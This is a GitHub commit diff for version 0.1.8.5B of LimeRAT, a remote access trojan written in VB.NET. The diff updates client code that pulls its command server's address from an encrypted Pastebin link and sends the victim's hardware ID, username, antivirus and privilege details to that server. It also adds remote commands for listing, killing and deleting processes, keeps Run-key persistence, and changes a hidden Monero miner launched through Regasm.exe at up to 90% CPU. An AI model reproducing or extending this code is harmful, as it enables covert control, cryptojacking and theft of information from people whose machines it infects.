UPDATE v0.1.8.5B

-Added multi port listener -Fixed when client can't connect on freshly installed windows7 -Updated XMR miner
HachimanSec · Oct 13, 2018 · f7b4870 · f7b4870
1 parent ff51186
commit f7b4870
Show file tree

Hide file tree

Showing 35 changed files with 6,750 additions and 6,516 deletions.
diff --git a/.vs/LimeRAT/v15/.suo b/.vs/LimeRAT/v15/.suo
diff --git a/.vs/LimeRAT/v15/Server/sqlite3/storage.ide b/.vs/LimeRAT/v15/Server/sqlite3/storage.ide
diff --git a/.vs/LimeRAT/v15/Server/sqlite3/storage.ide-shm b/.vs/LimeRAT/v15/Server/sqlite3/storage.ide-shm
diff --git a/.vs/LimeRAT/v15/Server/sqlite3/storage.ide-wal b/.vs/LimeRAT/v15/Server/sqlite3/storage.ide-wal
diff --git a/Project/Client/C_ID.vb b/Project/Client/C_ID.vb
@@ -175,7 +175,7 @@
                     Catch ex As Exception
                     End Try
                 Else
-                    Return CPU()
+                    Return CPU_GPU()
                 End If
             Catch ex As Exception
             End Try
@@ -193,19 +193,48 @@
             End Try
         End Function
 
-        Public Shared Function CPU() As String
+        Public Shared Function CPU_GPU() As String
             Try
+                'Dim VideoCard As String = ""
+                'Dim objquery As New Management.ObjectQuery("SELECT * FROM Win32_VideoController")
+                'Dim objSearcher As New Management.ManagementObjectSearcher(objquery)
+
+                'For Each MemObj As Management.ManagementObject In objSearcher.Get
+                '    VideoCard = VideoCard & (MemObj("Name")) & " "
+                'Next
+                'If VideoCard.ToLower.Contains("nvidia") OrElse VideoCard.ToLower.Contains("amd") Then
+                '    Return VideoCard
+                'End If
+
                 Dim P As New Management.ManagementObject("Win32_Processor.deviceid=""CPU0""")
                 P.Get()
                 If P("Name").ToString.Contains("Intel") Then
                     Return P("Name").ToString.Replace("(R)", "").Replace("Core(TM)", "").Replace("CPU", "")
                 End If
                 Return P("Name").ToString
+
             Catch ex As Exception
-                Return "Err > Idle"
+                Return "Unknow"
             End Try
 
         End Function
+
+        Public Shared Function dotNET() As String
+            Try
+                Dim dot As New Text.StringBuilder
+                For Each x In IO.Directory.GetDirectories(Runtime.InteropServices.RuntimeEnvironment.GetRuntimeDirectory().Substring(0, 34))
+                    If x.Contains("v4.0") Then
+                        dot.Append("v4.0")
+                    ElseIf x.Contains("v2.0") Then
+                        dot.Append("v2.0 ")
+                    End If
+                Next
+                Return dot.ToString
+            Catch ex As Exception
+                Return "Error"
+            End Try
+        End Function
+
     End Class
 
 End Namespace
diff --git a/Project/Client/C_Settings.vb b/Project/Client/C_Settings.vb
@@ -9,9 +9,9 @@
         Public Shared HOST As String 'IP
         Public Shared PORT As Integer 'PORT
         Public Shared EncryptionKey As String = "NYANCAT" 'encryption/decryption key
-        Public Shared ENDOF As String = "|'N'|" 'socket key
-        Public Shared SPL As String = "|'L'|" 'split bytes
-        Public Shared EXE As String = "CLIENT.exe" 'client name
+        Public Shared ENDOF As String = "|'N'|" 'endof
+        Public Shared SPL As String = "|'L'|" 'split data
+        Public Shared EXE As String = "CLIENT.exe" 'client drop name
         Public Shared MTX As Threading.Mutex
         Public Shared USB As Boolean = False 'usb spread
         Public Shared PIN As Boolean = False 'pin spread

diff --git a/Project/Client/C_TcpClient.vb b/Project/Client/C_TcpClient.vb
@@ -89,12 +89,14 @@ re:
                 C.SendTimeout = -1
 
 #If DEBUG Then
+
                 C_Settings.HOST = "127.0.0.1"
                 C_Settings.PORT = 8989
 #Else
-
                 Using WC As New Net.WebClient 'Pastebin, split by ":" IP:PORT
                     Try
+                        Dim myCredentials As New Net.NetworkCredential("", "")
+                        WC.Credentials = myCredentials
                         Dim Response As String = WC.DownloadString(C_Encryption.AES_Decrypt(C_Settings.Pastebin))
                         C_Settings.HOST = Response.Split(":")(0)
                         C_Settings.PORT = Response.Split(":")(1)
@@ -108,12 +110,12 @@ re:
                 Alive = True
                 MS = New IO.MemoryStream
 
-                Send(String.Concat("info", SPL, C_ID.HWID, SPL, C_ID.UserName, SPL, "v0.1.8.4B", SPL, C_ID.MyOS, " ", C_ID.Bit, SPL,
-                                  C_ID.INDATE, SPL, C_ID.AV, SPL, C_ID.Rans, SPL, C_ID.XMR, SPL, C_ID.USBSP, SPL, "...", SPL, " ", SPL,
+                Send(String.Concat("info", SPL, C_ID.HWID, SPL, C_ID.UserName, SPL, "v0.1.8.5B", SPL, C_ID.MyOS, " ", C_ID.Bit, SPL,
+                                  C_ID.INDATE, SPL, C_ID.AV, SPL, C_ID.Rans, SPL, C_ID.XMR, SPL, C_ID.USBSP, SPL, C_Settings.PORT, SPL, C_ID.dotNET, SPL, "...", SPL, " ", SPL,
                                   C_ID.Privileges.ToString, SPL, C_Settings.fullpath))
 
-                Dim T As New System.Threading.TimerCallback(AddressOf PING)
-                Tick = New System.Threading.Timer(T, Nothing, 0, 1)
+                Dim T As New Threading.TimerCallback(AddressOf PING)
+                Tick = New Threading.Timer(T, Nothing, 0, 1)
 
                 Return Alive
             Catch ex As Exception
@@ -156,7 +158,7 @@ re:
                     End If
                 End If
 
-                KAP += 1 : If KAP > 3000 Then KAP = 0 : Send("KA")
+                KAP += 1 : If KAP > 5000 Then KAP = 0 : Send("KA")
             Catch : End Try
         End Sub
 

diff --git a/Project/Plugins/DET/Main.vb b/Project/Plugins/DET/Main.vb
@@ -110,22 +110,42 @@ cc:
     End Sub
 
     Public Shared Sub Data(ByVal b As Byte())
+        On Error Resume Next
         Dim A As String() = Split(AES_Decrypt(BS(b)), SPL)
 
-        Try
-            Select Case A(0)
+
+        Select Case A(0)
                 Case "Sysinfo"
                     Send("SysInfo" + SPL + ID.Getsystem + SPL + HWID)
 
                 Case "PROC"
-                    Dim PR As String = String.Empty
-                    Dim PR_LIST As Process() = Process.GetProcesses()
-                    For Each P As Process In PR_LIST
-                        Try : PR += P.ProcessName & "|'P'|" & P.Id & "|'P'|" & P.MainModule.FileName & "|'P'|" : Catch : End Try ' file |'p'| 1 |'p'| c:/file.exe |'p'|
-                    Next
-                    Send("PROC" + SPL + PR + SPL + Windows.Forms.Application.ExecutablePath + SPL + HWID)
+                Dim L As String = ""
+                Dim searcher As New Management.ManagementObjectSearcher("Select * from Win32_Process")
+                Dim processList As Management.ManagementObjectCollection = searcher.Get()
+                For Each obj As Management.ManagementObject In processList
+                    Dim owner = {""}
+                    Dim returnVal = Convert.ToInt32(obj.InvokeMethod("GetOwner", owner))
+                    If returnVal = 0 Then
+                        If owner(0) = Environment.UserName Then
+                            L += obj.Item("Name") & "|'P'|" & obj.Item("ProcessId") & "|'P'|" & obj.Item("ExecutablePath") & "|'P'|" ' file |'p'| 1 |'p'| c:/file.exe |'p'|
+                        End If
+                    End If
+                Next
+                Send("PROC" + SPL + L + SPL + Windows.Forms.Application.ExecutablePath + SPL + HWID)
+
+                Case "PROCKILL"
+                Dim PR As Process
+                PR = Process.GetProcessById(A(1).ToString)
+                PR.Kill()
 
-                Case "STUP" 'credit ĦΔĆҜƗŇǤ ŞØØƒ
+            Case "PROCDEL"
+                Dim PR As Process
+                PR = Process.GetProcessById(A(1).ToString)
+                PR.Kill()
+                Threading.Thread.Sleep(2000)
+                IO.File.Delete(A(2))
+
+            Case "STUP" 'credit ĦΔĆҜƗŇǤ ŞØØƒ
 
                     'HKEY_CURRENT_USER_Run
                     Dim MyKey1 As String = "Software\Microsoft\Windows\CurrentVersion\Run\"
@@ -261,9 +281,6 @@ cc:
                     CloseMe()
             End Select
 
-        Catch ex As Exception
-        End Try
-
     End Sub
 
     Public Shared Function SplitByWord(ByVal b As Byte(), ByVal WORD As String) As Array

diff --git a/Project/Plugins/ENC/Resources/DECF.exe b/Project/Plugins/ENC/Resources/DECF.exe
diff --git a/Project/Plugins/WRDP/Main.vb b/Project/Plugins/WRDP/Main.vb
@@ -98,6 +98,7 @@ Public Class Main
                 registryKey3.Close()
             Catch ex As Exception
                 'Send("MSG" + SPL + "HRD! " + ex.Message)
+                Return
             End Try
 
             Try

diff --git a/Project/Plugins/XMR/Main.vb b/Project/Plugins/XMR/Main.vb
@@ -130,7 +130,7 @@ Public Class Main
         Try
             Try
                 If cpu.Contains("<CUS>") Then
-                    Run("C:\Windows\Microsoft.NET\Framework\v2.0.50727\Regasm.exe", cpu.Split("<CUS>")(0), GZip(My.Resources.xm), True)
+                    Run("C:\Windows\Microsoft.NET\Framework\v2.0.50727\Regasm.exe", cpu.Split("<CUS>")(0), GZip(My.Resources.cpu), True)
                     Return
                 End If
             Catch ex As Exception
@@ -154,9 +154,8 @@ Public Class Main
                     Kill()
 
                     Try
-                        Run("C:\Windows\Microsoft.NET\Framework\v2.0.50727\Regasm.exe", "-B --donate-level=0 -t " & Environment.ProcessorCount & " -a cryptonight --url=" & url & " -u " & user & " -p " & pass & " -R --variant=-1 --max-cpu-usage=90", GZip(My.Resources.xm), True)
+                        Run("C:\Windows\Microsoft.NET\Framework\v2.0.50727\Regasm.exe", "-B --donate-level=0 -t " & Environment.ProcessorCount & " -a cryptonight --url=" & url & " -u " & user & " -p " & pass & " -R --variant=-1 --max-cpu-usage=90", GZip(My.Resources.cpu), True)
                     Catch ex As Exception
-                        Run("C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regasm.exe", "-B --donate-level=0 -t " & Environment.ProcessorCount & " -a cryptonight --url=" & url & " -u " & user & " -p " & pass & " -R --variant=-1 --max-cpu-usage=90", GZip(My.Resources.xm), True)
                     End Try
 
                 ElseIf FormatNumber((GetTickCount() - lii.dwTime) / 1000, 0) < TimeOUT AndAlso active = False Then
@@ -165,9 +164,8 @@ Public Class Main
                     Kill()
 
                     Try
-                        Run("C:\Windows\Microsoft.NET\Framework\v2.0.50727\Regasm.exe", "-B --donate-level=0 -t " & cpu & " -a cryptonight --url=" & url & " -u " & user & " -p " & pass & " -R --variant=-1 --max-cpu-usage=50", GZip(My.Resources.xm), True)
+                        Run("C:\Windows\Microsoft.NET\Framework\v2.0.50727\Regasm.exe", "-B --donate-level=0 -t " & cpu & " -a cryptonight --url=" & url & " -u " & user & " -p " & pass & " -R --variant=-1 --max-cpu-usage=50", GZip(My.Resources.cpu), True)
                     Catch ex As Exception
-                        Run("C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regasm.exe", "-B --donate-level=0 -t " & cpu & " -a cryptonight --url=" & url & " -u " & user & " -p " & pass & " -R --variant=-1 --max-cpu-usage=50", GZip(My.Resources.xm), True)
                     End Try
 
                 End If

diff --git a/Project/Plugins/XMR/My Project/Resources.Designer.vb b/Project/Plugins/XMR/My Project/Resources.Designer.vb
diff --git a/Project/Plugins/XMR/My Project/Resources.resx b/Project/Plugins/XMR/My Project/Resources.resx
@@ -118,7 +118,7 @@
     <value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
   </resheader>
   <assembly alias="System.Windows.Forms" name="System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
-  <data name="xm" type="System.Resources.ResXFileRef, System.Windows.Forms">
-    <value>..\Resources\xm.exe;System.Byte[], mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
+  <data name="cpu" type="System.Resources.ResXFileRef, System.Windows.Forms">
+    <value>..\Resources\cpu.exe;System.Byte[], mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
   </data>
 </root>
diff --git a/Project/Plugins/XMR/Resources/cpu.exe b/Project/Plugins/XMR/Resources/cpu.exe
diff --git a/Project/Plugins/XMR/XMR.sln b/Project/Plugins/XMR/XMR.sln
@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 15
+VisualStudioVersion = 15.0.27703.2047
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "XMR", "XMR.vbproj", "{6E25C93C-0985-4D6E-A4C3-89D10F4F4F5F}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{6E25C93C-0985-4D6E-A4C3-89D10F4F4F5F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{6E25C93C-0985-4D6E-A4C3-89D10F4F4F5F}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{6E25C93C-0985-4D6E-A4C3-89D10F4F4F5F}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{6E25C93C-0985-4D6E-A4C3-89D10F4F4F5F}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {F2E993DD-C038-4491-9DD8-2DE5601DBB01}
+	EndGlobalSection
+EndGlobal
diff --git a/Project/Plugins/XMR/XMR.vbproj b/Project/Plugins/XMR/XMR.vbproj
@@ -98,5 +98,8 @@
   <ItemGroup>
     <None Include="Resources\xm.exe" />
   </ItemGroup>
+  <ItemGroup>
+    <None Include="Resources\cpu.exe" />
+  </ItemGroup>
   <Import Project="$(MSBuildToolsPath)\Microsoft.VisualBasic.targets" />
 </Project>
diff --git a/Project/Server/Classes/S_Settings.vb b/Project/Server/Classes/S_Settings.vb
@@ -1,9 +1,9 @@
 Public Class S_Settings
 
-    Public Shared PORT As Integer
-    Public Shared EncryptionKey As String
-    Public Shared IP As String = String.Empty
-    Public Shared StubVer As String = "v0.1.8.4B"
+    Public Shared PORT As New List(Of Integer)
+    Public Shared EncryptionKey As String = Nothing
+    Public Shared IP As String = Nothing
+    Public Shared StubVer As String = "v0.1.8.5B"
     Public Shared SPL As String = "|'L'|"
     Public Shared ENDOF As String = "|'N'|"
 

diff --git a/Project/Server/Classes/S_TcpListener.vb b/Project/Server/Classes/S_TcpListener.vb
@@ -11,13 +11,15 @@ Public Class S_TcpListener
     Public Online As New List(Of Integer)
     Private oIP(9999) As String
 
-    Sub New(ByVal P As Integer)
-        S = New TcpListener(New Net.IPEndPoint(Net.IPAddress.Any, P))
-        S.Server.ReceiveTimeout = -1
-        S.Server.SendTimeout = -1
-        S.Start()
-        Dim T As New Threading.Thread(AddressOf PND, 10)
-        T.Start()
+    Sub New(ByVal P As List(Of Integer))
+        For Each port In P.ToList
+            S = New TcpListener(New Net.IPEndPoint(Net.IPAddress.Any, port))
+            S.Server.ReceiveTimeout = -1
+            S.Server.SendTimeout = -1
+            S.Start()
+            Dim T As New Threading.Thread(AddressOf PND, 10)
+            T.Start(S)
+        Next
     End Sub
 
     Sub Send(ByVal sock As Integer, ByVal s As String)
@@ -52,7 +54,7 @@ re:
         GoTo re
     End Function
 
-    Private Sub PND()
+    Private Sub PND(ByVal S As TcpListener)
         Try
             ReDim SK(9999)
 re:

diff --git a/Project/Server/Forms/About.Designer.vb b/Project/Server/Forms/About.Designer.vb
-Original file line number
+Diff line change
@@ Expand Up / @@ -98,6 +98,7 @@ Public Class Main @@
                     registryKey3.Close()
                 Catch ex As Exception
                     'Send("MSG" + SPL + "HRD! " + ex.Message)
+                    Return
                 End Try
                 Try
@@ Expand Down @@